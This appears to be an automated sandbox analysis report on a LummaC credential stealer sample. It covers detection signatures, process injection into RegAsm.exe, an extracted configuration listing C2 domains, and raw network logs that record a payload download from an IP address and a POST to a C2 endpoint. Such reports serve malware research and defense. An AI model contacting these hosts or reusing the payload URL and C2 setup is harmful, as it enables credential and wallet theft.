Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
qoqD1RxV0F.exe

Overview

General Information

Sample name:qoqD1RxV0F.exe
renamed because original name is a hash value
Original sample name:896078e90b854c34f629d64493e4166a.exe
Analysis ID:1580260
MD5:896078e90b854c34f629d64493e4166a
SHA1:5037da5e892d2dee9537195dc8b2917591c5357d
SHA256:d9f50f7ece15d4decb568deb5afa024dee677bfb436408ea2fdf3297415d6978
Tags:exeuser-abuse_ch
Infos:

Detection

LummaC
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Antivirus detection for dropped file
Found malware configuration
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected LummaC Stealer
.NET source code contains very large strings
.NET source code references suspicious native API functions
AI detected suspicious sample
Allocates memory in foreign processes
C2 URLs / IPs found in malware configuration
Compiles code for process injection (via .Net compiler)
Injects a PE file into a foreign processes
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses process hollowing technique
Sample uses string decryption to hide its real strings
Sigma detected: Dot net compiler compiles file from suspicious location
Writes to foreign memory regions
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Compiles C# or VB.Net code
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Enables debug privileges
Found dropped PE file which has not been started or loaded
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Dynamic .NET Compilation Via Csc.EXE
Suricata IDS alerts with low severity for network traffic
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • qoqD1RxV0F.exe (PID: 7136 cmdline: "C:\Users\user\Desktop\qoqD1RxV0F.exe" MD5: 896078E90B854C34F629D64493E4166A)
    • csc.exe (PID: 4500 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline" MD5: EB80BB1CA9B9C7F516FF69AFCFD75B7D)
      • conhost.exe (PID: 5488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • cvtres.exe (PID: 5420 cmdline: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES634D.tmp" "c:\Users\user\AppData\Local\Temp\ldukos0s\CSCAE8F24CA40C840259D2783B6D24C303E.TMP" MD5: 70D838A7DC5B359C3F938A71FAD77DB0)
    • RegAsm.exe (PID: 412 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 5828 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
    • RegAsm.exe (PID: 2172 cmdline: "C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\RegAsm.exe" MD5: 0D5DF43AF2916F47D00C1573797C1A13)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
{"C2 url": ["aspecteirs.lat", "volcanoyev.click", "necklacebudi.lat", "crosshuaht.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
    SourceRuleDescriptionAuthorStrings
    Process Memory Space: qoqD1RxV0F.exe PID: 7136JoeSecurity_AntiVM_3Yara detected AntiVM_3Joe Security
      decrypted.memstrJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security

        System Summary

        barindex
        Source: Process startedAuthor: Florian Roth (Nextron Systems), X__Junior (Nextron Systems): Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\qoqD1RxV0F.exe", ParentImage: C:\Users\user\Desktop\qoqD1RxV0F.exe, ParentProcessId: 7136, ParentProcessName: qoqD1RxV0F.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline", ProcessId: 4500, ProcessName: csc.exe
        Source: File createdAuthor: frack113: Data: EventID: 11, Image: C:\Users\user\Desktop\qoqD1RxV0F.exe, ProcessId: 7136, TargetFilename: C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline

        Data Obfuscation

        barindex
        Source: Process startedAuthor: Joe Security: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline", CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, ParentCommandLine: "C:\Users\user\Desktop\qoqD1RxV0F.exe", ParentImage: C:\Users\user\Desktop\qoqD1RxV0F.exe, ParentProcessId: 7136, ParentProcessName: qoqD1RxV0F.exe, ProcessCommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.cmdline", ProcessId: 4500, ProcessName: csc.exe
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-24T08:18:02.509976+010020283713Unknown Traffic192.168.2.549705172.67.195.241443TCP
        2024-12-24T08:18:08.905028+010020283713Unknown Traffic192.168.2.549706172.67.195.241443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-24T08:18:08.381085+010020546531A Network Trojan was detected192.168.2.549705172.67.195.241443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-24T08:18:08.381085+010020498361A Network Trojan was detected192.168.2.549705172.67.195.241443TCP
        TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
        2024-12-24T08:17:59.259674+010028593771A Network Trojan was detected192.168.2.549704147.45.44.13180TCP

        Click to jump to signature section

        Show All Signature Results

        AV Detection

        barindex
        Source: qoqD1RxV0F.exeAvira: detected
        Source: https://volcanoyev.click:443/apiAvira URL Cloud: Label: malware
        Source: https://volcanoyev.click/Avira URL Cloud: Label: malware
        Source: volcanoyev.clickAvira URL Cloud: Label: malware
        Source: https://volcanoyev.click/apiAvira URL Cloud: Label: malware
        Source: C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dllAvira: detection malicious, Label: HEUR/AGEN.1300034
        Source: 7.2.RegAsm.exe.400000.0.raw.unpackMalware Configuration Extractor: LummaC {"C2 url": ["aspecteirs.lat", "volcanoyev.click", "necklacebudi.lat", "crosshuaht.lat", "grannyejh.lat", "sustainskelet.lat", "rapeflowwj.lat", "energyaffai.lat", "discokeyus.lat"], "Build id": "VC6Dfm--Loader2"}
        Source: qoqD1RxV0F.exeVirustotal: Detection: 39%Perma Link
        Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
        Source: C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.dllJoe Sandbox ML: detected
        Source: qoqD1RxV0F.exeJoe Sandbox ML: detected
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: rapeflowwj.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: crosshuaht.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: sustainskelet.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: aspecteirs.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: energyaffai.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: necklacebudi.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: discokeyus.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: grannyejh.lat
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: volcanoyev.click
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: lid=%s&j=%s&ver=4.0
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: TeslaBrowser/5.5
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Screen Resoluton:
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: - Physical Installed Memory:
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: Workgroup: -
        Source: 00000007.00000002.2135814434.0000000000400000.00000040.00000400.00020000.00000000.sdmpString decryptor: VC6Dfm--Loader2
        Source: unknownHTTPS traffic detected: 172.67.195.241:443 -> 192.168.2.5:49705 version: TLS 1.2
        Source: qoqD1RxV0F.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
        Source: Binary string: $]q8C:\Users\user\AppData\Local\Temp\ldukos0s\ldukos0s.pdb source: qoqD1RxV0F.exe, 00000000.00000002.2055586170.0000000002494000.00000004.00000800.00020000.00000000.sdmp
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [ebp+ebx-10h]7_2_0043C767
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_0042984F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax-0Dh]7_2_00423860
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ecx7_2_00438810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edi+ebp*8], 5E874B5Fh7_2_00438810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [edx+edi*8], BC9C9AFCh7_2_00438810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then test eax, eax7_2_00438810
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], al7_2_0041682D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+18h]7_2_0041682D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [esp+ecx-75h]7_2_0041682D
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], bp7_2_0041D83A
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push C0BFD6CCh7_2_00423086
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push C0BFD6CCh7_2_00423086
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add ebp, dword ptr [esp+0Ch]7_2_0042B170
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [esp+00000080h]7_2_004179C1
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [esi+edx*8], E5FE86B7h7_2_0043B1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax7_2_0043B1D0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx7_2_004291DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]7_2_004291DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax7_2_00405990
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebp, eax7_2_00405990
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, esi7_2_00422190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], cx7_2_00422190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [edi+eax+02h], 0000h7_2_00422190
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl7_2_0042CA49
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al7_2_0042DA53
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+eax-7D4F867Fh]7_2_00416263
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax+61D008CBh]7_2_00415220
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push esi7_2_00427AD3
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl7_2_0042CAD0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebx], ax7_2_0041B2E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push ebx7_2_0043CA93
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_0041CB40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx7_2_0041CB40
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [eax], cx7_2_00428B61
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl7_2_0042CB11
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], cl7_2_0042CB22
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edx, byte ptr [esp+eax]7_2_0043F330
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax7_2_0040DBD9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, eax7_2_0040DBD9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]7_2_00417380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp word ptr [ebx+edi+02h], 0000h7_2_0041D380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp al, 2Eh7_2_00426B95
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ebx, byte ptr [edx]7_2_00435450
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx esi, byte ptr [esp+ecx-7D4F867Fh]7_2_00417380
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then push 00000000h7_2_00429C2B
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ecx], dx7_2_004291DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, dword ptr [ebp-20h]7_2_004291DD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then add eax, dword ptr [esp+ecx*4+24h]7_2_004074F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, word ptr [edi+esi*4]7_2_004074F0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]7_2_0043ECA0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then cmp dword ptr [ebx+edi*8], 9C259492h7_2_004385E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp eax7_2_004385E0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx edi, byte ptr [esp+ecx-7D4F88C7h]7_2_00417DEE
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_00409580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [ebp+00h], ax7_2_00409580
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [0044450Ch]7_2_00418591
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebp-68h]7_2_00428D93
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor edi, edi7_2_0041759F
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [0044473Ch]7_2_0041C653
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov edx, ebp7_2_00425E70
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp dword ptr [004455F4h]7_2_00425E30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_0043AEC0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then xor byte ptr [esp+eax+17h], al7_2_00408F50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [edi], bl7_2_00408F50
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ebx, dword ptr [edi+04h]7_2_0042A700
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then lea edx, dword ptr [ecx+01h]7_2_0040B70C
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov byte ptr [esi], al7_2_0041BF14
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov eax, dword ptr [ebx+edi+44h]7_2_00419F30
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+423C9D38h]7_2_0041E7C0
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx eax, word ptr [edx]7_2_004197C2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [edi], dx7_2_004197C2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov word ptr [esi], cx7_2_004197C2
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, ebx7_2_0042DFE9
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then jmp ecx7_2_0040BFFD
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov esi, eax7_2_00415799
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then mov ecx, eax7_2_00415799
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 4x nop then movzx ecx, byte ptr [esp+eax+68E75405h]7_2_0043EFB0

        Networking

        barindex
        Source: Network trafficSuricata IDS: 2859377 - Severity 1 - ETPRO MALWARE Generic Powershell Loader Requesting Additional Payloads (GET) : 192.168.2.5:49704 -> 147.45.44.131:80
        Source: Network trafficSuricata IDS: 2049836 - Severity 1 - ET MALWARE Lumma Stealer Related Activity : 192.168.2.5:49705 -> 172.67.195.241:443
        Source: Network trafficSuricata IDS: 2054653 - Severity 1 - ET MALWARE Lumma Stealer CnC Host Checkin : 192.168.2.5:49705 -> 172.67.195.241:443
        Source: Malware configuration extractorURLs: aspecteirs.lat
        Source: Malware configuration extractorURLs: volcanoyev.click
        Source: Malware configuration extractorURLs: necklacebudi.lat
        Source: Malware configuration extractorURLs: crosshuaht.lat
        Source: Malware configuration extractorURLs: grannyejh.lat
        Source: Malware configuration extractorURLs: sustainskelet.lat
        Source: Malware configuration extractorURLs: rapeflowwj.lat
        Source: Malware configuration extractorURLs: energyaffai.lat
        Source: Malware configuration extractorURLs: discokeyus.lat
        Source: global trafficHTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 24 Dec 2024 07:17:59 GMTServer: Apache/2.4.52 (Ubuntu)Last-Modified: Sun, 22 Dec 2024 14:07:09 GMTETag: "49c00-629dc654be596"Accept-Ranges: bytesContent-Length: 302080Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdos-programData Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 04 00 d1 3c 5f 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 00 00 ec 03 00 00 ac 00 00 00 00 00 00 50 88 00 00 00 10 00 00 00 00 00 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 60 05 00 00 04 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 bf 1b 04 00 8c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 05 00 88 38 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 1d 04 00 bc 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 36 eb 03 00 00 10 00 00 00 ec 03 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 64 61 74 61 00 00 97 20 00 00 00 00 04 00 00 22 00 00 00 f0 03 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 64 61 74 61 00 00 00 e4 e1 00 00 00 30 04 00 00 50 00 00 00 12 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 72 65 6c 6f 63 00 00 88 38 00 00 00 20 05 00 00 3a 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
        Source: global trafficHTTP traffic detected: GET /infopage/inbg.exe HTTP/1.1X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJqHost: 147.45.44.131Connection: Keep-Alive
        Source: Joe Sandbox ViewIP Address: 147.45.44.131 147.45.44.131
        Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
        Source: Joe Sandbox ViewASN Name: FREE-NET-ASFREEnetEU FREE-NET-ASFREEnetEU
        Source: Joe Sandbox ViewJA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49705 -> 172.67.195.241:443
        Source: Network trafficSuricata IDS: 2028371 - Severity 3 - ET JA3 Hash - Possible Malware - Fake Firefox Font Update : 192.168.2.5:49706 -> 172.67.195.241:443
        Source: global trafficHTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: volcanoyev.click
